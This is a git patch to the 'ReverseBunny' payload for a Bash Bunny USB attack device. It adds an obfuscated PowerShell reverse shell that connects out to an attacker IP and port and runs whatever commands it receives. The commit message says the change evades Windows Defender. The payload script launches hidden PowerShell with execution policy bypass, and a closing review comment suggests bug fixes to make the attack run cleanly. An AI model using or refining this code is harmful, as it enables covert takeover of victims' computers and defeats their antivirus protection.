From 86c989f9a01b23deb5472191b411cb79af217f3e Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Sat, 2 Oct 2021 21:58:58 +0200 Subject: [PATCH] Updated ReverseBunny (#469) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md --- .../remote_access/ReverseBunny/README.md | 5 +- .../ReverseBunny/ReverseBunny.txt | 2 +- .../remote_access/ReverseBunny/payload.txt | 51 ++++++++++++++----- 3 files changed, 40 insertions(+), 18 deletions(-)
diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md
index 7f478362..ba8e344e 100644
--- a/payloads/library/remote_access/ReverseBunny/README.md
+++ b/payloads/library/remote_access/ReverseBunny/README.md
@@ -6,7 +6,4 @@ Version: 1.0
 Getting remote access via obfuscated reverse shell.
-ReverseBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB.
-
-# Red.............Payload running
-# Green .............Finished
+RevBunny.txt needs to be configured $IP=Attacker IP, $PORT=Attacker Port & present on the BB.
diff --git a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
index 1aa4f158..65d50681 100644
--- a/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
+++ b/payloads/library/remote_access/ReverseBunny/ReverseBunny.txt
@@ -1 +1 @@ -$IP='0.0.0.0';$PORT=4444; ( nEW-ObjeCt sysTEm.io.CoMPRessIOn.deFLatEStReaM([sYstem.iO.MemorySTREam][COnVERT]::frOMBASE64STring( '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' ) , [iO.CompRESsiON.CoMprEssionmodE]::deComprEsS )|%{nEW-ObjeCt io.STrEaMrEadEr( $_ , [sYSTEm.text.EncoDING]::asCii)} |% { $_.rEaDTOEND( ) } ) | . ( ([StrIng]$VeRboSepReFeReNCE)[1,3]+'x'-JoIN'') \ No newline at end of file +$bb =(gwmi win32_volume -f 'label=''BashBunny''').Name;$IP='0.0.0.0';$PORT=4444;Start-Sleep 5;New-Item -ItemType file $bb"DONE";;(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");${J`F5Z6}= [typE]("{3}{4}{1}{2}{0}"-f'INg',("{0}{1}" -f'XT.','eN'),'cOD','T','e'); ${clI`e`Nt} = &("{1}{0}{3}{2}" -f 'ew','N','t',("{0}{1}"-f ("{0}{1}"-f'-O','bj'),'ec')) ("{2}{7}{1}{3}{0}{6}{5}{8}{4}" -f("{1}{0}"-f '.T',("{0}{1}"-f 'ke','ts')),'.','Sys',("{0}{1}"-f 'Net',("{1}{0}" -f'Soc','.')),'nt','PCl','C','tem','ie')(${IP},${pO`RT});${st`ReAm} = ${c`l`iENT}.("{2}{0}{1}{3}"-f'e',("{0}{1}" -f 'tSt','r'),'G','eam')."I`N`Voke"();[byte[]]${by`T`es} = 0..65535|.('%'){0};while((${i} = ${stRe`AM}.("{1}{0}" -f 'ad','Re')."InVO`KE"(${B`y`TES}, 0, ${BYt`eS}."LEn`GTh")) -ne 0){;${D`ATA} = (.("{3}{1}{2}{0}" -f ("{0}{1}"-f 'je','ct'),'w-','Ob','Ne') -TypeName ("{6}{5}{0}{4}{2}{3}{7}{1}"-f 'st',("{0}{1}" -f 'di','ng'),("{1}{0}"-f ("{1}{0}" -f't.A','Tex'),'.'),("{1}{0}" -f'E',("{1}{0}" -f'II','SC')),'em','y','S','nco'))."Ge`Ts`Tr`inG"(${BYt`ES},0, ${I});${Se`N`DbAck} = (.("{1}{0}" -f'ex','i') ${d`AtA} 2>&1 | &("{1}{0}{2}" -f'ut','O',("{0}{1}" -f '-',("{2}{0}{1}" -f 't',("{1}{0}" -f'g','rin'),'S'))) );${Send`B`Ac`K2} = ${sEn`DBack} + 'PS ' + (.("{1}{0}"-f 'wd','p'))."P`ATh" + '> ';${sEN`dB`yTE} = ( ${j`F`5Z6}::"AS`CIi").("{1}{0}{2}"-f 't','Ge',("{0}{1}" -f 'By','tes'))."I`NvoKE"(${s`e`NdBA`Ck2});${str`e`AM}.("{0}{1}"-f 'W',("{0}{1}" -f'r','ite'))."In`VOke"(${Send`BYtE},0,${Send`BYtE}."lE`N`gTh");${s`Tr`eaM}.("{1}{0}" -f 
'ush','Fl')."inV`oKe"()};${ClI`E`Nt}.("{1}{0}" -f 'se','Clo')."iNV`O`KE"();
diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt
index 7f45b871..945fac51 100644
--- a/payloads/library/remote_access/ReverseBunny/payload.txt
+++ b/payloads/library/remote_access/ReverseBunny/payload.txt
@@ -1,30 +1,55 @@
+#!/bin/bash
+#
 # Title: ReverseBunny
-# Description: Obfuscated reverse shell, executed via powershell
+# Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me.
 # Author: 0iphor13
-# Version: 1.0
-# Category: Execution
+# Version: 1.1
+# Category: Remote_Access
 # Attackmodes: HID, Storage
+LED SETUP
+
 GET SWITCH_POSITION
-ATTACKMODE HID STORAGE DUCKY_LANG de
-#LED RED - DON'T EJECT - PAYLOAD RUNNING
+rm /root/udisk/DONE
-LED R FAST
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
 DELAY 5000
-RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
-DELAY 2000
+RUN WIN "powershell -NoP -NonI -W hidden -Exec Bypass"
+DELAY 6000
-Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\ReverseBunny.txt'))"
-DELAY 5000
+Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\RevBunny.txt'))"
+DELAY 10000
 Q ENTER
-DELAY 5000
+DELAY 10000
 Q CONTROL v
-DELAY 5000
+DELAY 10000
 Q ENTER
+DELAY 1000
+
+LED STAGE2
+
+until [ -f /root/udisk/DONE ]
+ do
+ sleep 0.2
+done
+
+LED CLEANUP
+
+rm /root/udisk/DONE
+
+DELAY 100
+
+sync
+
+DELAY 100
 LED FINISH
-#SAVE TO EJECT
\ No newline at end of file
+#SAVE TO EJECT
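Review bot: The new `Q STRING` line (and the README in this same commit) now reads `RevBunny.txt`, but the diff still modifies `payloads/library/remote_access/ReverseBunny/ReverseBunny.txt` with no rename, so the path the payload reads does not match the file the repository ships; either rename the file in the commit or keep `ReverseBunny.txt` in the `Q STRING` line so the two agree. The first `rm /root/udisk/DONE` runs before the marker file can normally exist, so it will print a "No such file" error on most runs; `rm -f -- /root/udisk/DONE` is the quiet form for both occurrences. As a point of style, the wait loop puts `do` on a line of its own with an odd indent; the conventional shape is `until [ -f /root/udisk/DONE ]; do` with the `sleep` body indented beneath it.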